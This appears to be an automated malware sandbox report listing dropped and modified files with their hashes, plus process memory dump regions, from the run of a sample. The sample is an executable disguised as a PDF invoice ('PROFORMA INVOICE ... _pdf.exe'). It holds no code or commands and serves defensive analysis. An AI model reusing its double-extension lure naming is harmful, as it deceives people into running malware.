41785febb3bce5997812ab812909e7db

SHA1
c2dae6cfbf5e28bb34562db75601fadd1f67eacb

SHA256
696a298fa617f26115168d70442c29f2d854f595497ea2034124a7e27b036483

SHA512
b82cfd843b13487c79dc5c7f07c84a236cf2065d69c9e0a79d36ac1afc78fa04fba30c31903f48d1d2d44f17fb951002e90fb4e92b9eae7677dbb6f023e68919

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
5ef382103c2ecc6267279757370ce5ac

SHA1
520f64a739f59656c611d0b783bee42d4e667bfa

SHA256
6afece4535029c9c78968ccb0cc74d0ae0f49eb23964939604a57f12ca4a22d2

SHA512
4b5b1f12b688a32b691336d9a24bf745e9abbc156c4dba87c678f824f8be7bfe69b0daad65dc1c76d30538d2ffc70bc3d8707042c46606b6ab8ce86e1d307475

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f857219db3294ead1624b73062dcd342

SHA1
0ccfc372bfc124990e969db9c752d61114881f13

SHA256
14c2054f9ccecb2246dc61fd32eeef50b1a5013ebaa34b19913353f5b73485a2

SHA512
81809d478a3266b5c909f9ac3d154a7def618ea6ef25776ecb54da642dd91f194fd76220c6bd93c26e90515a4318dd0dbf15077a5e621c53fb96a76222e951a5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
3e4dc1516687bb7006d9d5beeb8b9669

SHA1
44786ca262d29efc26293cc0947eb6756237159e

SHA256
257d8317c15b6875998aa889cd072f4fa569521129cc5c3c7795a02b9af927ba

SHA512
265256e0a421fa451c22dd97279585b1e118596e6b64250ef7cd67929de664f02805fd955562fe0937c06030896933a2d2ad674ba9947458a1c90bfc4d8b2ce7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
22d52c9dc08f863467b663a9fb8ab896

SHA1
a249d17b6f690b10b84d0298ca594577d74cbc8b

SHA256
2604f39bbd4d34deb6b6d14cec5ceb828c671c17c4fa8a22262d92785abcc9db

SHA512
8d77ccb0bc7d5020d9929bee2df2ee1e1a45a36ccb2f197cff38a0c968135c07a05e59cf98a6e060723a9c737bc7a32e3cf48c1b1cad9196b25a958544f5de47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
956d0584ecd54a7d3a03993101a56cb7

SHA1
bd197223170ebb21a23ae995edd1690cadc6a2e0

SHA256
63f57b52d488911a983707c849c68d5c959bcb5d86cbf76f8dcc63c3cbec607d

SHA512
137e870f445fa2be99b65f3b515a64c891e5d8d631387475f9b199121597294ca4c82039b87e9cf3bda8c6ba76baf59b6c6de191f4b46fba93afe568fa5ab7d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
100ee76da08b4a100178b3d83e7cffa2

SHA1
4bda247cd62fe86de956ad558e829d1f93d15740

SHA256
02f45c6a9714569faa8a0e92157aac5b80227b436cf7d17525b73d58bc1f09c9

SHA512
3430a3ecfd8de85e9cb7dd26d438dfdc31f2e5dc5210c4e0bd17237204ef1e67991da9879615cc48cf1c42dd66ca9611c234eee3a34714a59e5e5e063c9da50a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
da3b99d11d0b3f9f04f3e89d674531ff

SHA1
8b61a9dd80bec3cf7cd5776e8157f6cb0b94925a

SHA256
7d15e7d1a55e92f8657738a2ac83d62a919f756eb189fd6550cc498b3869212c

SHA512
a9947e43c0facfa1da21103e6526ec9b920ff9c9cd262c36caf855fffe3076bf948cdb670a83bfb5bc547880c933261f9dd8637f78c2714fb9d52ebf2f0ac9b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
e872ec0781a0dd404cb10a323e4ab383

SHA1
61ce0b9e59a42c7ab55930be276c57cb419bf380

SHA256
388a94c8cd6f6f17b9a959932202e20736277b3181666cc31729969b13aa22c6

SHA512
7f5addc98f60d6dab8f9b5c2494db71e1094069e5b7e543e83d86cc736a92d700bc08ba5c0ae0ed311e04ad00f67aef875aa1446c319a70cb8d1a765310f9e79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
3da18e6bf89530a0c36350d27a9d113f

SHA1
d52f545f12bff0612b8a190b8cc6b65fb9d38386

SHA256
b39738bea50c022952e17e58d9e3db59ee4ac661e6e42cda2c95c200e15bcc2e

SHA512
4961044a6f5ef7245bbbf15d9f370ad97a59f46498c6c1361b0185f1fbd3768d2023068e5123d0e567e3f60ad84d0a3775e612a1fb7f1f78dd6e07590b359e0f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
fe18cda0dc7c858ac4cfe97b86b678b6

SHA1
d9e16bf95a0076b31dcebe0b2f0f1669e441a797

SHA256
a747a5b72d1d93f683f2ab572132f3855f9430ff9e578a0da298f34fc94eb72f

SHA512
b0810e3fb71170deae2a6ab651199a5b129c90071e7c945b484d08d9bce00355ca63447a0c96b3b99d34f7d6dd3d2c332dcd441174038243b0a1b54bf2bde654

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59d816.TMP

Filesize
48B

MD5
6834081e591585a4afaf769db34af2c2

SHA1
488362079e8fdccd2cc4ae3d7efd4abf5d031eff

SHA256
150b32b9e9ad3153b3f4842a05591e988aaff727c94984af7850e54e2881cb91

SHA512
ddb7466c5dd4d97fbd5254f799bc1c2c60627f91f30223648cbb6ca27fb0f8a55678da364447c338d5f8c79487ac6c75a014db8d8057ddaeeac2d4c43be2a783

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
90de7b0b901ac4e1165a74925a8e5425

SHA1
4d444bbc848a0f0b419f81b25f07ea65244a412f

SHA256
87869ed6c4515c87b5a9dbcfa77ce8931cdd7073317049b4d1e173ef9417a7fd

SHA512
74f07c67eb3251ef5c918a59f3f3c721104a3a22462214a900866430d8c360ed9042bff0ff2bd5af423eea05c878710a513d0dd56c8fc4f964d6bb389f4954db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
6331f5c64f21fd2a9c4485a3057eaa3c

SHA1
aa02540afdabdba40530231b4062f36d97cfbf19

SHA256
781f67b9722d149b63e2114bca94afb024a3c6b428029b35eb94ee9bb325a7f7

SHA512
ebf2efd8b84b84578148bc7e66c02e43c7652fdffc69bda03d63194b818f4c38506353d698f274a31971fe3feee6fd5632e9571edefa5952753df155067b0593

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
ce99b30ea15a8a1e361ad20d46069e1b

SHA1
2ee56b70a37e681b86d973609f3274681e8ca54b

SHA256
c89e12d1461f4c299d701b6e9afd9efa846293d8d9d463626d295c8e8e2d6c68

SHA512
1f8d37a9365d776354e0db21544444ded25dca366f92a420175501744d66c404e6404a4f3305b14c073f165c5741994749b53b980cb67151356bee928c35bbb5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5861a3.TMP

Filesize
94KB

MD5
7e29f62d298752a8333e19f9e9b5a3fe

SHA1
b1fddaba535d1790230b9f4ed9feca8f9dab54f6

SHA256
a4a61d52d1d394b89310162cadaab89d1bdcb914c581f57e386de48d9ff62809

SHA512
0d7d71b32cfb1bef594d1d0e90d0a9375563e24f172e3fe0e7a7622ffac7ee31a2310891cc8a8cdb143ea02dd37ba686fed6baa40a589a041e8e6125db108890

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5e96f241ac28217523620f880b1e9981

SHA1
e4207f19ecb96ee4d5e64c70541f71cede0c0686

SHA256
016eafebcfef3684d8d8d7dcf84a757681ff89aebeeaf8f7faac4ea0f8bd771f

SHA512
733bf792131c6add21b575ee23e2fa34d5bc158d05889deeb4623c41007e25490e3bc54e633de12770953ea1c5adc170a052add54d6bc668cb4e359a4aa50d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
290c30ce724c670bfb2d6609cc1ff420

SHA1
5d5ceb98b17a9d6c5a49ecd565bc9fd782a41b1b

SHA256
50191da321df1ad552aaab15ed83ffbb0e4733cfc8dbd2dc5deb7959dc268438

SHA512
f28e2d167bc89421111cb3bbb25f913555f8f975e950635d3676ab26fe4b7e892c26eea1c845b98c35115eb304bfe419dfe9036eb7495eae0c22b2e7f47a1940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
08978af26bbfb95bef97b3553967a404

SHA1
bd29e77929506b66d461e09dd86560389277c7b9

SHA256
e8fe24b38f2cf88e3921cf23f68d0fa8c00fcea89d197a37e919098de3e22cfb

SHA512
e69c7e5f7231be03b52849d17c3030793cee65b7d89dd4690bb4f72ddd125244cacf512eddd2b7193db98c16fdb00e57ccf187d164705491205fd568ac6c92d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
19111da3ddecf4d50336359c35157a52

SHA1
8c949376dc87fa0c84779197b876d47d23e82eb3

SHA256
84cc6bdbe5617ca0129f81b9905f8cbba0f379820b7d205e594f35c9b7551283

SHA512
5c27ab96224bb6e6a9eb584bc2015c3ade2d64a68ebc0996a9a2aebf1aaa4161acf2cdb71b9bca8dbb87f39a303d460972c9b12c7fd551e70aac03f53105777d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkmtw521.ftq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe

Filesize
599KB

MD5
d1f104fa71a71fb996bfdb6900e3121b

SHA1
d1ca9a6b5ab50638d6df628e0f33bc350877f9db

SHA256
f5d6baba3e22c289cec89d787a0adaa91af7a92d283ad01b8d3e9c54f9e75a9d

SHA512
6e7d82488cae216a554584ca95ad12b578e1b4dd8577768fec7e16c2e181100df48a00446a8d6ad6d61bb22a1a429d2a36b92297b33a5d33711cd3f092a0fb5b

Download Submit
C:\Users\Admin\Downloads\vbvhg6.lzh.crdownload

Filesize
599KB

MD5
f0bf37020ca8f4ba8fd8b3921f2392a3

SHA1
4c6b74519e10558934a2cec515d4b05cac0ad0b6

SHA256
a8565325e215185ad509a93d81840c14c4bd595386c9352665900c66ca38514b

SHA512
0aad2cea07ddd2e489bcc197bc9fde632b343135ecf1aa4cbf904621e21c00c8125af998d1e8173627b07bcd27695d7f632581ab3372f1ccef80593be2dab1ff

Download Submit
\??\pipe\crashpad_3044_MSRYZRKFKJRIPLWF

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/3752-130-0x0000000007AB0000-0x0000000007ABA000-memory.dmp

Filesize
40KB

Download
memory/3752-109-0x0000000006710000-0x000000000672E000-memory.dmp

Filesize
120KB

Download
memory/3752-127-0x0000000007910000-0x00000000079B3000-memory.dmp

Filesize
652KB

Download
memory/3752-128-0x0000000008080000-0x00000000086FA000-memory.dmp

Filesize
6.5MB

Download
memory/3752-129-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/3752-116-0x00000000710A0000-0x00000000710EC000-memory.dmp

Filesize
304KB

Download
memory/3752-131-0x0000000007CB0000-0x0000000007D46000-memory.dmp

Filesize
600KB

Download
memory/3752-132-0x0000000007C30000-0x0000000007C41000-memory.dmp

Filesize
68KB

Download
memory/3752-133-0x0000000007C60000-0x0000000007C6E000-memory.dmp

Filesize
56KB

Download
memory/3752-134-0x0000000007C70000-0x0000000007C84000-memory.dmp

Filesize
80KB

Download
memory/3752-135-0x0000000007D70000-0x0000000007D8A000-memory.dmp

Filesize
104KB

Download
memory/3752-136-0x0000000007D50000-0x0000000007D58000-memory.dmp

Filesize
32KB

Download
memory/3752-115-0x0000000006D00000-0x0000000006D32000-memory.dmp

Filesize
200KB

Download
memory/3752-95-0x0000000005140000-0x0000000005176000-memory.dmp

Filesize
216KB

Download
memory/3752-96-0x00000000057D0000-0x0000000005DF8000-memory.dmp

Filesize
6.2MB

Download
memory/3752-97-0x0000000005740000-0x0000000005762000-memory.dmp

Filesize
136KB

Download
memory/3752-98-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/3752-99-0x00000000060D0000-0x0000000006136000-memory.dmp

Filesize
408KB

Download
memory/3752-126-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

Filesize
120KB

Download
memory/3752-110-0x0000000006740000-0x000000000678C000-memory.dmp

Filesize
304KB

Download
memory/4376-113-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4648-221-0x0000000070300000-0x000000007034C000-memory.dmp

Filesize
304KB

Download
memory/4676-178-0x0000000070300000-0x000000007034C000-memory.dmp

Filesize
304KB

Download
memory/4676-176-0x00000000056E0000-0x0000000005A34000-memory.dmp

Filesize
3.3MB

Download
memory/5132-111-0x0000000005740000-0x000000000574A000-memory.dmp

Filesize
40KB

Download
memory/5132-89-0x0000000000750000-0x00000000007EA000-memory.dmp

Filesize
616KB

Download
memory/5132-112-0x0000000005730000-0x000000000573A000-memory.dmp

Filesize
40KB

Download
memory/5132-90-0x00000000051B0000-0x0000000005504000-memory.dmp

Filesize
3.3MB

Download
memory/5132-91-0x0000000005B40000-0x00000000060E4000-memory.dmp

Filesize
5.6MB

Download
memory/5132-92-0x0000000005670000-0x0000000005702000-memory.dmp

Filesize
584KB

Download
memory/5132-93-0x00000000055D0000-0x00000000055FA000-memory.dmp

Filesize
168KB

Download
memory/5132-94-0x00000000057B0000-0x000000000584C000-memory.dmp

Filesize
624KB

Download
memory/5596-153-0x0000000070300000-0x000000007034C000-memory.dmp

Filesize
304KB

Download
memory/5596-141-0x0000000005C20000-0x0000000005F74000-memory.dmp

Filesize
3.3MB

Download
memory/5596-152-0x0000000006790000-0x00000000067DC000-memory.dmp

Filesize
304KB

Download
memory/5596-163-0x0000000006860000-0x0000000006903000-memory.dmp

Filesize
652KB

Download
memory/5596-164-0x0000000007830000-0x0000000007841000-memory.dmp

Filesize
68KB

Download
memory/5596-165-0x0000000007870000-0x0000000007884000-memory.dmp

Filesize
80KB

Download
memory/6044-200-0x0000000070300000-0x000000007034C000-memory.dmp

Filesize
304KB

Download
memory/6044-189-0x0000000005870000-0x0000000005BC4000-memory.dmp

Filesize
3.3MB

Download